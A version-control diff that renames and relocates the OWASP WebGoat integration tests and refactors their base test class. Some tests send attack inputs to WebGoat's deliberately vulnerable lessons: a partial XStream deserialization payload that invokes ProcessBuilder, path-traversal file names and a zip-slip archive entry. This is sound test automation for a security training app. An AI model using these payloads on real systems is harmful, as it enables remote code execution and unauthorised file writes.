View File

@ -14,16 +14,16 @@ import java.util.Map;
import javax.xml.bind.DatatypeConverter; import javax.xml.bind.DatatypeConverter;
import org.junit.jupiter.api.Test; import org.junit.jupiter.api.Test;
import org.owasp.webgoat.crypto.CryptoUtil; import org.owasp.webgoat.lessons.cryptography.CryptoUtil;
import org.owasp.webgoat.crypto.HashingAssignment; import org.owasp.webgoat.lessons.cryptography.HashingAssignment;
import io.restassured.RestAssured; import io.restassured.RestAssured;
public class CryptoTest extends IntegrationTest { public class CryptoIntegrationTest extends IntegrationTest {
@Test @Test
public void runTests() { public void runTests() {
startLesson("Crypto"); startLesson("Cryptography");
checkAssignment2(); checkAssignment2();
checkAssignment3(); checkAssignment3();

10
webgoat-integration-tests/src/test/java/org/owasp/webgoat/DeserializationTest.java → src/it/java/org/owasp/webgoat/DeserializationIntegrationTest.java
View File

@ -1,14 +1,14 @@
package org.owasp.webgoat; package org.owasp.webgoat;
import org.dummy.insecure.framework.VulnerableTaskHolder;
import org.junit.jupiter.api.Test;
import org.owasp.webgoat.lessons.deserialization.SerializationHelper;
import java.io.IOException; import java.io.IOException;
import java.util.HashMap; import java.util.HashMap;
import java.util.Map; import java.util.Map;
import org.dummy.insecure.framework.VulnerableTaskHolder; public class DeserializationIntegrationTest extends IntegrationTest {
import org.junit.jupiter.api.Test;
import org.owasp.webgoat.deserialization.SerializationHelper;
public class DeserializationTest extends IntegrationTest {
private static String OS = System.getProperty("os.name").toLowerCase(); private static String OS = System.getProperty("os.name").toLowerCase();

4
webgoat-integration-tests/src/test/java/org/owasp/webgoat/GeneralLessonTest.java → src/it/java/org/owasp/webgoat/GeneralLessonIntegrationTest.java
View File

@ -10,7 +10,7 @@ import java.util.HashMap;
import java.util.Map; import java.util.Map;
public class GeneralLessonTest extends IntegrationTest { public class GeneralLessonIntegrationTest extends IntegrationTest {
@Test @Test
public void httpBasics() { public void httpBasics() {
@ -65,7 +65,7 @@ public class GeneralLessonTest extends IntegrationTest {
@Test @Test
public void vulnerableComponents() { public void vulnerableComponents() {
String solution = "<contact class='dynamic-proxy'>\n" + String solution = "<contact class='dynamic-proxy'>\n" +
"<interface>org.owasp.webgoat.vulnerable_components.Contact</interface>\n" + "<interface>org.owasp.webgoat.lessons.vulnerable_components.Contact</interface>\n" +
" <handler class='java.beans.EventHandler'>\n" + " <handler class='java.beans.EventHandler'>\n" +
" <target class='java.lang.ProcessBuilder'>\n" + " <target class='java.lang.ProcessBuilder'>\n" +
" <command>\n" + " <command>\n" +

2
webgoat-integration-tests/src/test/java/org/owasp/webgoat/IDORTest.java → src/it/java/org/owasp/webgoat/IDORIntegrationTest.java
View File

@ -19,7 +19,7 @@ import io.restassured.RestAssured;
import io.restassured.http.ContentType; import io.restassured.http.ContentType;
import lombok.SneakyThrows; import lombok.SneakyThrows;
public class IDORTest extends IntegrationTest { public class IDORIntegrationTest extends IntegrationTest {
@BeforeEach @BeforeEach
@SneakyThrows @SneakyThrows

166
webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java → src/it/java/org/owasp/webgoat/IntegrationTest.java
View File

@ -3,99 +3,51 @@ package org.owasp.webgoat;
import io.restassured.RestAssured; import io.restassured.RestAssured;
import io.restassured.http.ContentType; import io.restassured.http.ContentType;
import lombok.Getter; import lombok.Getter;
import lombok.extern.slf4j.Slf4j;
import org.hamcrest.CoreMatchers; import org.hamcrest.CoreMatchers;
import org.hamcrest.MatcherAssert; import org.hamcrest.MatcherAssert;
import org.junit.jupiter.api.AfterEach; import org.junit.jupiter.api.AfterEach;
import org.junit.jupiter.api.BeforeEach; import org.junit.jupiter.api.BeforeEach;
import org.junit.jupiter.api.BeforeAll;
import org.owasp.webwolf.WebWolf;
import org.springframework.boot.builder.SpringApplicationBuilder;
import java.io.IOException;
import java.net.Socket;
import java.util.Map; import java.util.Map;
import java.util.UUID; import java.util.Objects;
import static io.restassured.RestAssured.given; import static io.restassured.RestAssured.given;
@Slf4j
public abstract class IntegrationTest { public abstract class IntegrationTest {
protected static int WG_PORT = 8080; private static String webGoatPort = Objects.requireNonNull(System.getProperty("webgoatport"));
protected static int WW_PORT = 9090; @Getter
private static String WEBGOAT_HOSTNAME = "127.0.0.1";//"www.webgoat.local"; private static String webWolfPort = Objects.requireNonNull(System.getProperty("webwolfport"));
private static String WEBWOLF_HOSTNAME = "127.0.0.1";//"www.webwolf.local"; private static boolean useSSL = false;
private static String webgoatUrl = (useSSL ? "https:" : "http:") + "//localhost:" + webGoatPort + "/WebGoat/";
/* private static String webWolfUrl = (useSSL ? "https:" : "http:") + "//localhost:" + webWolfPort + "/";
* To test docker compose/stack solution:
* add localhost settings in hosts file: 127.0.0.1 www.webgoat.local www.webwolf.local
* Then set the above values to the specified host names and set the port to 80
*/
private static String WEBGOAT_HOSTHEADER = WEBGOAT_HOSTNAME +":"+WG_PORT;
private static String WEBWOLF_HOSTHEADER = WEBWOLF_HOSTNAME +":"+WW_PORT;
private static String WEBGOAT_URL = "http://" + WEBGOAT_HOSTHEADER + "/WebGoat/";
private static String WEBWOLF_URL = "http://" + WEBWOLF_HOSTHEADER + "/";
private static boolean WG_SSL = false;//enable this if you want to run the test on ssl
@Getter @Getter
private String webGoatCookie; private String webGoatCookie;
@Getter @Getter
private String webWolfCookie; private String webWolfCookie;
@Getter @Getter
private String webgoatUser = UUID.randomUUID().toString(); private String user = "webgoat";
private static boolean started = false;
@BeforeAll
public static void beforeAll() {
if (WG_SSL) {
WEBGOAT_URL = WEBGOAT_URL.replace("http:", "https:");
}
if (!started) {
started = true;
if (!isAlreadyRunning(WG_PORT)) {
SpringApplicationBuilder wgs = new SpringApplicationBuilder(StartWebGoat.class)
.properties(Map.of("spring.config.name", "application-webgoat,application-inttest", "WEBGOAT_SSLENABLED", WG_SSL, "WEBGOAT_PORT", WG_PORT));
wgs.run();
}
if (!isAlreadyRunning(WW_PORT)) {
SpringApplicationBuilder wws = new SpringApplicationBuilder(WebWolf.class)
.properties(Map.of("spring.config.name", "application-webwolf,application-inttest", "WEBWOLF_PORT", WW_PORT));
wws.run();
}
}
}
private static boolean isAlreadyRunning(int port) {
try (var ignored = new Socket("127.0.0.1", port)) {
return true;
} catch (IOException e) {
return false;
}
}
protected String url(String url) { protected String url(String url) {
url = url.replaceFirst("/WebGoat/", ""); url = url.replaceFirst("/WebGoat/", "");
url = url.replaceFirst("/WebGoat", ""); url = url.replaceFirst("/WebGoat", "");
url = url.startsWith("/") ? url.replaceFirst("/", "") : url; url = url.startsWith("/") ? url.replaceFirst("/", "") : url;
return WEBGOAT_URL + url; return webgoatUrl + url;
} }
protected String webWolfUrl(String url) { protected String webWolfUrl(String url) {
url = url.replaceFirst("/WebWolf/", "");
url = url.replaceFirst("/WebWolf", "");
url = url.startsWith("/") ? url.replaceFirst("/", "") : url; url = url.startsWith("/") ? url.replaceFirst("/", "") : url;
return WEBWOLF_URL + url; return webWolfUrl + url;
} }
@BeforeEach @BeforeEach
public void login() { public void login() {
String location = given() String location = given()
.when() .when()
.relaxedHTTPSValidation() .relaxedHTTPSValidation()
.formParam("username", webgoatUser) .formParam("username", user)
.formParam("password", "password") .formParam("password", "password")
.post(url("login")).then() .post(url("login")).then()
.cookie("JSESSIONID") .cookie("JSESSIONID")
@ -105,7 +57,7 @@ public abstract class IntegrationTest {
webGoatCookie = RestAssured.given() webGoatCookie = RestAssured.given()
.when() .when()
.relaxedHTTPSValidation() .relaxedHTTPSValidation()
.formParam("username", webgoatUser) .formParam("username", user)
.formParam("password", "password") .formParam("password", "password")
.formParam("matchingPassword", "password") .formParam("matchingPassword", "password")
.formParam("agree", "agree") .formParam("agree", "agree")
@ -119,7 +71,7 @@ public abstract class IntegrationTest {
webGoatCookie = given() webGoatCookie = given()
.when() .when()
.relaxedHTTPSValidation() .relaxedHTTPSValidation()
.formParam("username", webgoatUser) .formParam("username", user)
.formParam("password", "password") .formParam("password", "password")
.post(url("login")).then() .post(url("login")).then()
.cookie("JSESSIONID") .cookie("JSESSIONID")
@ -130,12 +82,12 @@ public abstract class IntegrationTest {
webWolfCookie = RestAssured.given() webWolfCookie = RestAssured.given()
.when() .when()
.relaxedHTTPSValidation() .relaxedHTTPSValidation()
.formParam("username", webgoatUser) .formParam("username", user)
.formParam("password", "password") .formParam("password", "password")
.post(WEBWOLF_URL + "login") .post(webWolfUrl("login"))
.then() .then()
.cookie("WEBWOLFSESSION")
.statusCode(302) .statusCode(302)
.cookie("WEBWOLFSESSION")
.extract() .extract()
.cookie("WEBWOLFSESSION"); .cookie("WEBWOLFSESSION");
} }
@ -150,13 +102,8 @@ public abstract class IntegrationTest {
.statusCode(200); .statusCode(200);
} }
/**
* At start of a lesson. The .lesson.lesson is visited and the lesson is reset.
*
* @param lessonName
*/
public void startLesson(String lessonName) { public void startLesson(String lessonName) {
startLesson(lessonName, true); startLesson(lessonName, false);
} }
public void startLesson(String lessonName, boolean restart) { public void startLesson(String lessonName, boolean restart) {
@ -169,25 +116,16 @@ public abstract class IntegrationTest {
.statusCode(200); .statusCode(200);
if (restart) { if (restart) {
RestAssured.given() RestAssured.given()
.when() .when()
.relaxedHTTPSValidation() .relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie()) .cookie("JSESSIONID", getWebGoatCookie())
.get(url("service/restartlesson.mvc")) .get(url("service/restartlesson.mvc"))
.then() .then()
.statusCode(200); .statusCode(200);
} }
} }
/**
* Helper method for most common type of test.
* POST with parameters.
* Checks for 200 and lessonCompleted as indicated by expectedResult
*
* @param url
* @param params
* @param expectedResult
*/
public void checkAssignment(String url, Map<String, ?> params, boolean expectedResult) { public void checkAssignment(String url, Map<String, ?> params, boolean expectedResult) {
MatcherAssert.assertThat( MatcherAssert.assertThat(
RestAssured.given() RestAssured.given()
@ -201,17 +139,8 @@ public abstract class IntegrationTest {
.extract().path("lessonCompleted"), CoreMatchers.is(expectedResult)); .extract().path("lessonCompleted"), CoreMatchers.is(expectedResult));
} }
/**
* Helper method for most common type of test.
* PUT with parameters.
* Checks for 200 and lessonCompleted as indicated by expectedResult
*
* @param url
* @param params
* @param expectedResult
*/
public void checkAssignmentWithPUT(String url, Map<String, ?> params, boolean expectedResult) { public void checkAssignmentWithPUT(String url, Map<String, ?> params, boolean expectedResult) {
MatcherAssert.assertThat( MatcherAssert.assertThat(
RestAssured.given() RestAssured.given()
.when() .when()
.relaxedHTTPSValidation() .relaxedHTTPSValidation()
@ -245,12 +174,12 @@ public abstract class IntegrationTest {
.get(url("service/lessonoverview.mvc")) .get(url("service/lessonoverview.mvc"))
.andReturn(); .andReturn();
MatcherAssert.assertThat(result.then() MatcherAssert.assertThat(result.then()
.statusCode(200).extract().jsonPath().getList("solved"), CoreMatchers.everyItem(CoreMatchers.is(true))); .statusCode(200).extract().jsonPath().getList("solved"), CoreMatchers.everyItem(CoreMatchers.is(true)));
} }
public void checkAssignment(String url, ContentType contentType, String body, boolean expectedResult) { public void checkAssignment(String url, ContentType contentType, String body, boolean expectedResult) {
MatcherAssert.assertThat( MatcherAssert.assertThat(
RestAssured.given() RestAssured.given()
.when() .when()
.relaxedHTTPSValidation() .relaxedHTTPSValidation()
@ -264,8 +193,7 @@ public abstract class IntegrationTest {
} }
public void checkAssignmentWithGet(String url, Map<String, ?> params, boolean expectedResult) { public void checkAssignmentWithGet(String url, Map<String, ?> params, boolean expectedResult) {
log.info("Checking assignment for: {}", url); MatcherAssert.assertThat(
MatcherAssert.assertThat(
RestAssured.given() RestAssured.given()
.when() .when()
.relaxedHTTPSValidation() .relaxedHTTPSValidation()
@ -277,40 +205,26 @@ public abstract class IntegrationTest {
.extract().path("lessonCompleted"), CoreMatchers.is(expectedResult)); .extract().path("lessonCompleted"), CoreMatchers.is(expectedResult));
} }
public String getWebGoatServerPath() throws IOException { public String getWebWolfFileServerLocation() {
//read path from server
String result = RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("/WebGoat/xxe/tmpdir"))
.then()
.extract().response().getBody().asString();
result = result.replace("%20", " ");
return result;
}
public String getWebWolfServerPath() throws IOException {
//read path from server
String result = RestAssured.given() String result = RestAssured.given()
.when() .when()
.relaxedHTTPSValidation() .relaxedHTTPSValidation()
.cookie("WEBWOLFSESSION", getWebWolfCookie()) .cookie("WEBWOLFSESSION", getWebWolfCookie())
.get(webWolfUrl("/tmpdir")) .get(webWolfUrl("/file-server-location"))
.then() .then()
.extract().response().getBody().asString(); .extract().response().getBody().asString();
result = result.replace("%20", " "); result = result.replace("%20", " ");
return result; return result;
} }
/** public String webGoatServerDirectory() {
* In order to facilitate tests with return RestAssured.given()
* @return .when()
*/ .relaxedHTTPSValidation()
public String getWebWolfHostHeader() { .cookie("JSESSIONID", getWebGoatCookie())
return WEBWOLF_HOSTHEADER; .get(url("/server-directory"))
.then()
.extract().response().getBody().asString();
} }
} }

6
webgoat-integration-tests/src/test/java/org/owasp/webgoat/JWTLessonTest.java → src/it/java/org/owasp/webgoat/JWTLessonIntegrationTest.java
View File

@ -14,7 +14,6 @@ import java.util.Map;
import org.hamcrest.CoreMatchers; import org.hamcrest.CoreMatchers;
import org.hamcrest.MatcherAssert; import org.hamcrest.MatcherAssert;
import org.junit.jupiter.api.Test; import org.junit.jupiter.api.Test;
import org.owasp.webgoat.jwt.JWTSecretKeyEndpoint;
import com.fasterxml.jackson.databind.JsonNode; import com.fasterxml.jackson.databind.JsonNode;
import com.fasterxml.jackson.databind.ObjectMapper; import com.fasterxml.jackson.databind.ObjectMapper;
@ -28,12 +27,12 @@ import io.jsonwebtoken.Jwts;
import io.jsonwebtoken.SignatureAlgorithm; import io.jsonwebtoken.SignatureAlgorithm;
import io.jsonwebtoken.impl.TextCodec; import io.jsonwebtoken.impl.TextCodec;
import io.restassured.RestAssured; import io.restassured.RestAssured;
import org.owasp.webgoat.lessons.jwt.JWTSecretKeyEndpoint;
public class JWTLessonTest extends IntegrationTest { public class JWTLessonIntegrationTest extends IntegrationTest {
@Test @Test
public void solveAssignment() throws IOException, InvalidKeyException, NoSuchAlgorithmException { public void solveAssignment() throws IOException, InvalidKeyException, NoSuchAlgorithmException {
startLesson("JWT"); startLesson("JWT");
decodingToken(); decodingToken();
@ -49,7 +48,6 @@ public class JWTLessonTest extends IntegrationTest {
quiz(); quiz();
checkResults("/JWT/"); checkResults("/JWT/");
} }
private String generateToken(String key) { private String generateToken(String key) {

88
src/it/java/org/owasp/webgoat/LabelAndHintTest.java Normal file
View File

@ -0,0 +1,88 @@
package org.owasp.webgoat;
import io.restassured.RestAssured;
import io.restassured.http.ContentType;
import io.restassured.path.json.JsonPath;
import org.junit.jupiter.api.Assertions;
import org.junit.jupiter.api.Test;
import java.io.FileInputStream;
import java.io.InputStream;
import java.util.Properties;
public class LabelAndHintTest extends IntegrationTest {
@Test
public void testSingleLabel() {
Assertions.assertTrue(true);
JsonPath jsonPath = RestAssured.given()
.when()
.relaxedHTTPSValidation()
.contentType(ContentType.JSON)
.header("Accept-Language","en")
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("service/labels.mvc")).then().statusCode(200).extract().jsonPath();
Assertions.assertEquals("Try again: but this time enter a value before hitting go.", jsonPath.getString("\'http-basics.close\'"));
}
@Test
public void testLabels() {
Properties propsDefault = getProperties("");
System.out.println("Working Directory = " + System.getProperty("user.dir"));
checkLang(propsDefault,"nl");
checkLang(propsDefault,"de");
checkLang(propsDefault,"fr");
checkLang(propsDefault,"ru");
}
private Properties getProperties(String lang) {
Properties prop = null;
if (lang == null || lang.equals("")) { lang = ""; } else { lang = "_"+lang; }
try (InputStream input = new FileInputStream("src/main/resources/i18n/messages"+lang+".properties")) {
prop = new Properties();
// load a properties file
prop.load(input);
} catch (Exception e) {
e.printStackTrace();
}
return prop;
}
private void checkLang(Properties propsDefault, String lang) {
JsonPath jsonPath = getLabels(lang);
Properties propsLang = getProperties(lang);
for (String key: propsLang.stringPropertyNames()) {
if (!propsDefault.containsKey(key)) {
System.out.println("key: " + key + " in (" +lang+") is missing from default properties");
Assertions.fail();
}
if (!jsonPath.getString("\'"+key+"\'").equals(propsLang.get(key))) {
System.out.println("key: " + key + " in (" +lang+") has incorrect translation in label service");
System.out.println("actual:"+jsonPath.getString("\'"+key+"\'"));
System.out.println("expected: "+propsLang.getProperty(key));
System.out.println();
//Assertions.fail();
}
}
}
private JsonPath getLabels(String lang) {
return RestAssured.given()
.when()
.relaxedHTTPSValidation()
.contentType(ContentType.JSON)
.header("Accept-Language",lang)
.cookie("JSESSIONID", getWebGoatCookie())
//.log().headers()
.get(url("service/labels.mvc"))
.then()
//.log().all()
.statusCode(200).extract().jsonPath();
}
}

22
webgoat-integration-tests/src/test/java/org/owasp/webgoat/PasswordResetLessonTest.java → src/it/java/org/owasp/webgoat/PasswordResetLessonIntegrationTest.java
View File

@ -15,7 +15,7 @@ import static org.junit.jupiter.api.DynamicTest.dynamicTest;
import java.util.Arrays; import java.util.Arrays;
import java.util.Map; import java.util.Map;
public class PasswordResetLessonTest extends IntegrationTest { public class PasswordResetLessonIntegrationTest extends IntegrationTest {
@BeforeEach @BeforeEach
@SneakyThrows @SneakyThrows
@ -24,9 +24,9 @@ public class PasswordResetLessonTest extends IntegrationTest {
} }
@TestFactory @TestFactory
Iterable<DynamicTest> testPathTraversal() { Iterable<DynamicTest> passwordResetLesson() {
return Arrays.asList( return Arrays.asList(
dynamicTest("assignment 6 - check email link",()-> sendEmailShouldBeAvailabeInWebWolf()), dynamicTest("assignment 6 - check email link",()-> sendEmailShouldBeAvailableInWebWolf()),
dynamicTest("assignment 6 - solve assignment",()-> solveAssignment()), dynamicTest("assignment 6 - solve assignment",()-> solveAssignment()),
dynamicTest("assignment 2 - simple reset",()-> assignment2()), dynamicTest("assignment 2 - simple reset",()-> assignment2()),
dynamicTest("assignment 4 - guess questions",()-> assignment4()), dynamicTest("assignment 4 - guess questions",()-> assignment4()),
@ -34,18 +34,15 @@ public class PasswordResetLessonTest extends IntegrationTest {
); );
} }
public void assignment2() { public void assignment2() {
checkAssignment(url("PasswordReset/simple-mail/reset"), Map.of("emailReset", this.getUser()+"@webgoat.org"), false);
checkAssignment(url("PasswordReset/simple-mail/reset"), Map.of("emailReset", getWebgoatUser()+"@webgoat.org"), false); checkAssignment(url("PasswordReset/simple-mail"), Map.of("email", this.getUser()+"@webgoat.org", "password", StringUtils.reverse(this.getUser())), true);
checkAssignment(url("PasswordReset/simple-mail"), Map.of("email", getWebgoatUser()+"@webgoat.org", "password", StringUtils.reverse(getWebgoatUser())), true);
} }
public void assignment4() { public void assignment4() {
checkAssignment(url("PasswordReset/questions"), Map.of("username", "tom", "securityQuestion", "purple"), true); checkAssignment(url("PasswordReset/questions"), Map.of("username", "tom", "securityQuestion", "purple"), true);
} }
public void assignment5() { public void assignment5() {
checkAssignment(url("PasswordReset/SecurityQuestions"), Map.of("question", "What is your favorite animal?"), false); checkAssignment(url("PasswordReset/SecurityQuestions"), Map.of("question", "What is your favorite animal?"), false);
checkAssignment(url("PasswordReset/SecurityQuestions"), Map.of("question", "What is your favorite color?"), true); checkAssignment(url("PasswordReset/SecurityQuestions"), Map.of("question", "What is your favorite color?"), true);
} }
@ -63,9 +60,8 @@ public class PasswordResetLessonTest extends IntegrationTest {
checkAssignment(url("PasswordReset/reset/login"), Map.of("email", "tom@webgoat-cloud.org", "password", "123456"), true); checkAssignment(url("PasswordReset/reset/login"), Map.of("email", "tom@webgoat-cloud.org", "password", "123456"), true);
} }
public void sendEmailShouldBeAvailabeInWebWolf() { public void sendEmailShouldBeAvailableInWebWolf() {
clickForgotEmailLink(this.getUser() + "@webgoat.org");
clickForgotEmailLink(getWebgoatUser() + "@webgoat.org");
var responseBody = RestAssured.given() var responseBody = RestAssured.given()
.when() .when()
@ -100,7 +96,7 @@ public class PasswordResetLessonTest extends IntegrationTest {
.when() .when()
.relaxedHTTPSValidation() .relaxedHTTPSValidation()
.cookie("WEBWOLFSESSION", getWebWolfCookie()) .cookie("WEBWOLFSESSION", getWebWolfCookie())
.get(webWolfUrl("WebWolf/requests")) .get(webWolfUrl("/WebWolf/requests"))
.then() .then()
.extract().response().getBody().asString(); .extract().response().getBody().asString();
int startIndex = responseBody.lastIndexOf("/PasswordReset/reset/reset-password/"); int startIndex = responseBody.lastIndexOf("/PasswordReset/reset/reset-password/");
@ -111,7 +107,7 @@ public class PasswordResetLessonTest extends IntegrationTest {
private void clickForgotEmailLink(String user) { private void clickForgotEmailLink(String user) {
RestAssured.given() RestAssured.given()
.when() .when()
.header("host", getWebWolfHostHeader()) .header("host", String.format("%s:%s", "localhost", getWebWolfPort()))
.relaxedHTTPSValidation() .relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie()) .cookie("JSESSIONID", getWebGoatCookie())
.formParams("email", user) .formParams("email", user)

20
webgoat-integration-tests/src/test/java/org/owasp/webgoat/PathTraversalITTest.java → src/it/java/org/owasp/webgoat/PathTraversalIntegrationTest.java
View File

@ -24,7 +24,7 @@ import java.util.zip.ZipOutputStream;
import static org.junit.jupiter.api.DynamicTest.dynamicTest; import static org.junit.jupiter.api.DynamicTest.dynamicTest;
class PathTraversalITTest extends IntegrationTest { class PathTraversalIT extends IntegrationTest {
@TempDir @TempDir
Path tempDir; Path tempDir;
@ -58,7 +58,7 @@ class PathTraversalITTest extends IntegrationTest {
.cookie("JSESSIONID", getWebGoatCookie()) .cookie("JSESSIONID", getWebGoatCookie())
.multiPart("uploadedFile", "test.jpg", Files.readAllBytes(fileToUpload.toPath())) .multiPart("uploadedFile", "test.jpg", Files.readAllBytes(fileToUpload.toPath()))
.param("fullName", "../John Doe") .param("fullName", "../John Doe")
.post("/WebGoat/PathTraversal/profile-upload") .post(url("/WebGoat/PathTraversal/profile-upload"))
.then() .then()
.statusCode(200) .statusCode(200)
.extract().path("lessonCompleted"), CoreMatchers.is(true)); .extract().path("lessonCompleted"), CoreMatchers.is(true));
@ -72,7 +72,7 @@ class PathTraversalITTest extends IntegrationTest {
.cookie("JSESSIONID", getWebGoatCookie()) .cookie("JSESSIONID", getWebGoatCookie())
.multiPart("uploadedFileFix", "test.jpg", Files.readAllBytes(fileToUpload.toPath())) .multiPart("uploadedFileFix", "test.jpg", Files.readAllBytes(fileToUpload.toPath()))
.param("fullNameFix", "..././John Doe") .param("fullNameFix", "..././John Doe")
.post("/WebGoat/PathTraversal/profile-upload-fix") .post(url("/WebGoat/PathTraversal/profile-upload-fix"))
.then() .then()
.statusCode(200) .statusCode(200)
.extract().path("lessonCompleted"), CoreMatchers.is(true)); .extract().path("lessonCompleted"), CoreMatchers.is(true));
@ -85,7 +85,7 @@ class PathTraversalITTest extends IntegrationTest {
.relaxedHTTPSValidation() .relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie()) .cookie("JSESSIONID", getWebGoatCookie())
.multiPart("uploadedFileRemoveUserInput", "../test.jpg", Files.readAllBytes(fileToUpload.toPath())) .multiPart("uploadedFileRemoveUserInput", "../test.jpg", Files.readAllBytes(fileToUpload.toPath()))
.post("/WebGoat/PathTraversal/profile-upload-remove-user-input") .post(url("/WebGoat/PathTraversal/profile-upload-remove-user-input"))
.then() .then()
.statusCode(200) .statusCode(200)
.extract().path("lessonCompleted"), CoreMatchers.is(true)); .extract().path("lessonCompleted"), CoreMatchers.is(true));
@ -97,22 +97,23 @@ class PathTraversalITTest extends IntegrationTest {
.when() .when()
.relaxedHTTPSValidation() .relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie()) .cookie("JSESSIONID", getWebGoatCookie())
.get(uri) .get(url(uri))
.then() .then()
.statusCode(200) .statusCode(200)
.body(CoreMatchers.is("You found it submit the SHA-512 hash of your username as answer")); .body(CoreMatchers.is("You found it submit the SHA-512 hash of your username as answer"));
checkAssignment("/WebGoat/PathTraversal/random", Map.of("secret", Sha512DigestUtils.shaHex(getWebgoatUser())), true); checkAssignment(url("/WebGoat/PathTraversal/random"), Map.of("secret",
Sha512DigestUtils.shaHex(this.getUser())), true);
} }
private void assignment5() throws IOException { private void assignment5() throws IOException {
var webGoatHome = System.getProperty("java.io.tmpdir") + "/webgoat/PathTraversal/" + getWebgoatUser(); var webGoatHome = webGoatServerDirectory() + "PathTraversal/" + this.getUser();
webGoatHome = webGoatHome.replaceAll("^[a-zA-Z]:", ""); //Remove C: from the home directory on Windows webGoatHome = webGoatHome.replaceAll("^[a-zA-Z]:", ""); //Remove C: from the home directory on Windows
var webGoatDirectory = new File(webGoatHome); var webGoatDirectory = new File(webGoatHome);
var zipFile = new File(tempDir.toFile(), "upload.zip"); var zipFile = new File(tempDir.toFile(), "upload.zip");
try (var zos = new ZipOutputStream(new FileOutputStream(zipFile))) { try (var zos = new ZipOutputStream(new FileOutputStream(zipFile))) {
ZipEntry e = new ZipEntry("../../../../../../../../../../" + webGoatDirectory.toString() + "/image.jpg"); ZipEntry e = new ZipEntry("../../../../../../../../../../" + webGoatDirectory + "/image.jpg");
zos.putNextEntry(e); zos.putNextEntry(e);
zos.write("test".getBytes(StandardCharsets.UTF_8)); zos.write("test".getBytes(StandardCharsets.UTF_8));
} }
@ -122,11 +123,10 @@ class PathTraversalITTest extends IntegrationTest {
.relaxedHTTPSValidation() .relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie()) .cookie("JSESSIONID", getWebGoatCookie())
.multiPart("uploadedFileZipSlip", "upload.zip", Files.readAllBytes(zipFile.toPath())) .multiPart("uploadedFileZipSlip", "upload.zip", Files.readAllBytes(zipFile.toPath()))
.post("/WebGoat/PathTraversal/zip-slip") .post(url("/WebGoat/PathTraversal/zip-slip"))
.then() .then()
.statusCode(200) .statusCode(200)
.extract().path("lessonCompleted"), CoreMatchers.is(true)); .extract().path("lessonCompleted"), CoreMatchers.is(true));
} }
@AfterEach @AfterEach

3
webgoat-integration-tests/src/test/java/org/owasp/webgoat/ProgressRaceConditionTest.java → src/it/java/org/owasp/webgoat/ProgressRaceConditionIntegrationTest.java
View File

@ -2,7 +2,6 @@ package org.owasp.webgoat;
import io.restassured.RestAssured; import io.restassured.RestAssured;
import io.restassured.response.Response; import io.restassured.response.Response;
import lombok.extern.log4j.Log4j;
import org.assertj.core.api.Assertions; import org.assertj.core.api.Assertions;
import org.junit.jupiter.api.Test; import org.junit.jupiter.api.Test;
@ -16,7 +15,7 @@ import java.util.concurrent.Executors;
import java.util.stream.Collectors; import java.util.stream.Collectors;
import java.util.stream.IntStream; import java.util.stream.IntStream;
public class ProgressRaceConditionTest extends IntegrationTest { public class ProgressRaceConditionIntegrationTest extends IntegrationTest {
@Test @Test
public void runTests() throws InterruptedException { public void runTests() throws InterruptedException {

2
webgoat-integration-tests/src/test/java/org/owasp/webgoat/SSRFTest.java → src/it/java/org/owasp/webgoat/SSRFIntegrationTest.java
View File

@ -6,7 +6,7 @@ import java.util.Map;
import org.junit.jupiter.api.Test; import org.junit.jupiter.api.Test;
public class SSRFTest extends IntegrationTest { public class SSRFIntegrationTest extends IntegrationTest {
@Test @Test
public void runTests() throws IOException { public void runTests() throws IOException {

22
webgoat-integration-tests/src/test/java/org/owasp/webgoat/SeleniumTest.java → src/it/java/org/owasp/webgoat/SeleniumIntegrationTest.java
View File

@ -14,7 +14,7 @@ import org.openqa.selenium.firefox.FirefoxOptions;
import io.github.bonigarcia.wdm.WebDriverManager; import io.github.bonigarcia.wdm.WebDriverManager;
import io.github.bonigarcia.wdm.config.DriverManagerType; import io.github.bonigarcia.wdm.config.DriverManagerType;
public class SeleniumTest extends IntegrationTest { public class SeleniumIntegrationTest extends IntegrationTest {
static { static {
try { try {
@ -37,14 +37,14 @@ public class SeleniumTest extends IntegrationTest {
driver.get(url("/login")); driver.get(url("/login"));
driver.manage().timeouts().implicitlyWait(30, TimeUnit.SECONDS); driver.manage().timeouts().implicitlyWait(30, TimeUnit.SECONDS);
// Login // Login
driver.findElement(By.name("username")).sendKeys(getWebgoatUser()); driver.findElement(By.name("username")).sendKeys(this.getUser());
driver.findElement(By.name("password")).sendKeys("password"); driver.findElement(By.name("password")).sendKeys("password");
driver.findElement(By.className("btn")).click(); driver.findElement(By.className("btn")).click();
// Check if user exists. If not, create user. // Check if user exists. If not, create user.
if (driver.getCurrentUrl().equals(url("/login?error"))) { if (driver.getCurrentUrl().equals(url("/login?error"))) {
driver.get(url("/registration")); driver.get(url("/registration"));
driver.findElement(By.id("username")).sendKeys(getWebgoatUser()); driver.findElement(By.id("username")).sendKeys(this.getUser());
driver.findElement(By.id("password")).sendKeys("password"); driver.findElement(By.id("password")).sendKeys("password");
driver.findElement(By.id("matchingPassword")).sendKeys("password"); driver.findElement(By.id("matchingPassword")).sendKeys("password");
driver.findElement(By.name("agree")).click(); driver.findElement(By.name("agree")).click();
@ -73,27 +73,27 @@ public class SeleniumTest extends IntegrationTest {
driver.findElement(By.id("restart-lesson-button")).click(); driver.findElement(By.id("restart-lesson-button")).click();
driver.get(url("/start.mvc#lesson/SqlInjection.lesson/0")); driver.get(url("/start.mvc#lesson/SqlInjection.lesson/0"));
driver.get(url("/start.mvc#lesson/SqlInjection.lesson/1")); driver.get(url("/start.mvc#lesson/SqlInjection.lesson/1"));
driver.findElement(By.name("query")).sendKeys(SqlInjectionLessonTest.sql_2); driver.findElement(By.name("query")).sendKeys(SqlInjectionLessonIntegrationTest.sql_2);
driver.findElement(By.name("query")).submit(); driver.findElement(By.name("query")).submit();
driver.get(url("/start.mvc#lesson/SqlInjection.lesson/2")); driver.get(url("/start.mvc#lesson/SqlInjection.lesson/2"));
driver.findElements(By.name("query")).get(1).sendKeys(SqlInjectionLessonTest.sql_3); driver.findElements(By.name("query")).get(1).sendKeys(SqlInjectionLessonIntegrationTest.sql_3);
